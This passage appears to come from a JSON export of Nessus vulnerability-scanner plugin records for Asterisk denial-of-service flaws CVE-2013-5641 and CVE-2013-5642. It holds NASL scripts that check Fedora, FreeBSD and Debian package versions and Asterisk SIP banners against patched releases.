Security Advisory 2013-15560.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69886);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_bugtraq_id(62021, 62022);\n script_xref(name:\"FEDORA\", value:\"2013-15560\");\n\n script_name(english:\"Fedora 19 : asterisk-11.5.1-2.fc19 (2013-15560)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.5.1-2 :\n\n - Enable 
hardened build BZ#954338\n\n - Significant clean ups\n\n - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.5.1-1 :\n\n - The Asterisk Development Team has announced security\n releases for Certified\n\n - Asterisk 1.8.15, 11.2, and Asterisk 1.8, 10, and 11.\n The available security releases\n\n - are released as versions 1.8.15-cert2, 11.2-cert2,\n 1.8.23.1, 10.12.3, 10.12.3-digiumphones,\n\n - and 11.5.1.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1002044\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115650.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?552696dd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n 
script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"asterisk-11.5.1-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:57:01", "description": "The Asterisk project reports :\n\nRemote Crash From Late Arriving SIP ACK With SDP\n\nRemote Crash when Invalid SDP is sent in SIP Request", "cvss3": {}, "published": "2013-08-29T00:00:00", "type": "nessus", "title": "FreeBSD : asterisk -- multiple vulnerabilities (fd2bf3b5-1001-11e3-ba94-0025905a4771)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:asterisk10", "p-cpe:/a:freebsd:freebsd:asterisk11", "p-cpe:/a:freebsd:freebsd:asterisk18", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_FD2BF3B5100111E3BA940025905A4771.NASL", "href": "https://www.tenable.com/plugins/nessus/69499", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69499);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n\n script_name(english:\"FreeBSD : asterisk -- multiple vulnerabilities (fd2bf3b5-1001-11e3-ba94-0025905a4771)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Asterisk project reports :\n\nRemote Crash From Late Arriving SIP ACK With SDP\n\nRemote Crash when Invalid SDP is sent in SIP Request\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-004.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-005.html\"\n );\n # https://www.asterisk.org/security\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.asterisk.org/downloads/security-advisories\"\n );\n # https://vuxml.freebsd.org/freebsd/fd2bf3b5-1001-11e3-ba94-0025905a4771.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?094717d7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk18\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"asterisk11>11.*<11.5.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk10>10.*<10.12.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk18>1.8.*<1.8.21.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:58:48", "description": "- Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.5.1-2 :\n\n - Enable hardened build BZ#954338\n\n - Significant clean ups\n\n - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.5.1-1 :\n\n - The Asterisk Development Team has announced security releases for Certified Asterisk 1.8.15, 11.2, and Asterisk 1.8, 10, and 11. The available security releases are released as versions 1.8.15-cert2, 11.2-cert2, 1.8.23.1, 10.12.3, 10.12.3-digiumphones, and 11.5.1.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-09-14T00:00:00", "type": "nessus", "title": "Fedora 18 : asterisk-11.5.1-2.fc18 (2013-15567)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:18"], "id": "FEDORA_2013-15567.NASL", "href": "https://www.tenable.com/plugins/nessus/69887", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-15567.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69887);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_bugtraq_id(62021, 62022);\n script_xref(name:\"FEDORA\", value:\"2013-15567\");\n\n script_name(english:\"Fedora 18 : asterisk-11.5.1-2.fc18 (2013-15567)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.5.1-2 :\n\n - Enable 
hardened build BZ#954338\n\n - Significant clean ups\n\n - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.5.1-1 :\n\n - The Asterisk Development Team has announced security\n releases for Certified\n\n - Asterisk 1.8.15, 11.2, and Asterisk 1.8, 10, and 11.\n The available security releases\n\n - are released as versions 1.8.15-cert2, 11.2-cert2,\n 1.8.23.1, 10.12.3, 10.12.3-digiumphones,\n\n - and 11.5.1.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1002044\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115639.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4f6d185d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n 
script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"asterisk-11.5.1-2.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:58:35", "description": "Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in the SIP processing code of Asterisk - an open source PBX and telephony toolkit -, which could result in denial of service.", "cvss3": {}, "published": "2013-09-03T00:00:00", "type": "nessus", "title": "Debian DSA-2749-1 : asterisk - several vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:asterisk", "cpe:/o:debian:debian_linux:6.0", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2749.NASL", "href": "https://www.tenable.com/plugins/nessus/69542", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2749. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69542);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_bugtraq_id(62021, 62022);\n script_xref(name:\"DSA\", value:\"2749\");\n\n script_name(english:\"Debian DSA-2749-1 : asterisk - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony\ntoolkit -, which could result in denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://packages.debian.org/source/squeeze/asterisk\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/asterisk\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2013/dsa-2749\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the asterisk packages.\n\nFor the oldstable distribution (squeeze), these problems have been\nfixed in version 1:1.6.2.9-2+squeeze11.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 1.8.13.1~dfsg-3+deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"asterisk\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-config\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-dbg\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-dev\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-doc\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-h323\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-sounds-main\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-config\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-dahdi\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-dbg\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-dev\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-doc\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-mobile\", 
reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-modules\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-mp3\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-mysql\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-ooh323\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-voicemail\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-voicemail-imapstorage\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-voicemail-odbcstorage\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:59:16", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a denial of service vulnerability. 
\n\nThe application does not properly handle an invalid SDP in a SIP request if such a request defines media descriptions and then defines connection data.", "cvss3": {}, "published": "2013-09-03T00:00:00", "type": "nessus", "title": "Asterisk SIP Channel Driver Invalid SDP Denial of Service (AST-2013-005)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5642"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2013_005.NASL", "href": "https://www.tenable.com/plugins/nessus/69559", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69559);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-5642\");\n script_bugtraq_id(62022);\n\n script_name(english:\"Asterisk SIP Channel Driver Invalid SDP Denial of Service (AST-2013-005)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by a\ndenial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version in its SIP banner, the version of Asterisk\nrunning on the remote host is potentially affected by a denial of\nservice vulnerability. 
\n\nThe application does not properly handle an invalid SDP in a SIP request\nif such a request defines media descriptions and then defines connection\ndata.\");\n # https://www.asterisk.org/downloads/asterisk-news/asterisk-1815-cert3-18231-10123-10123-digiumphones-112-cert2-and-1151-now\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?116d061b\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-005.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-22007\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk 1.8.23.1 / 10.12.3 / 11.5.1 / Certified Asterisk\n1.8.15-cert3 / 11.2-cert2, or apply the appropriate patch listed in the\nAsterisk advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/03\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n 
